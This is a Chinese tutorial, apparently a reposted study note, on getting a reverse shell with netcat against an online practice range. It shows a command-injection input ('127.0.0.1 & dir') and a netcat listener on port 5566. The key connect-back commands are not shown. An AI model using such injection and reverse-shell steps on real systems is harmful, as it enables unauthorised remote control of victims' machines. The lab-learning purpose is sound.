首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

[保姆级教程]-通过NC反弹shell实战

注:本篇文章为个人学习笔记仅供学习交流。

目录

环境工具

步骤

环境工具

攻击机:CentOS7

目标机器:Windows

nc是netcat的简写,有着网络界的瑞士军刀美誉

步骤

1. 寻找在线靶场目标(切记,不要瞎整哈,容易包吃住)

3. 使用宝塔面板快速创建网站,自己有网站的可忽略此步骤。

5. 在线靶场输入命令,将nc上传到靶场环境

6. 上传后继续在靶场执行如下命令,查看nc是否上传成功

127.0.0.1 & dir

7. 控制端做反向连接,首先在控制端启动监听在攻击机上执行如下命令监听的5566端口,注意:攻击机的5566端口需要开放,如果是用宝塔面板也需要在宝塔面板开放端口。

nc -lv 5566

8. 目标机器做正向连接至控制端把受害主机的cmd终端发送至攻击者主机ip的5566端口,这种连接方式使得控制端能够接收来自受控端的连接,即使受控端的网络环境限制了其主动发起连接的能力.。在靶场执行如下命令:

9. 到这里使用nc的反弹shell就成功了,如下图

  • 发表于:
  • 原文链接https://page.om.qq.com/page/O-nMVQzGOz9B4FRlDNjP-2uQ0
  • 腾讯「腾讯云开发者社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 cloudcommunity@tencent.com 删除。

扫码

添加站长 进交流群

领取专属 10元无门槛券

私享最新 技术干货

扫码加入开发者社群
领券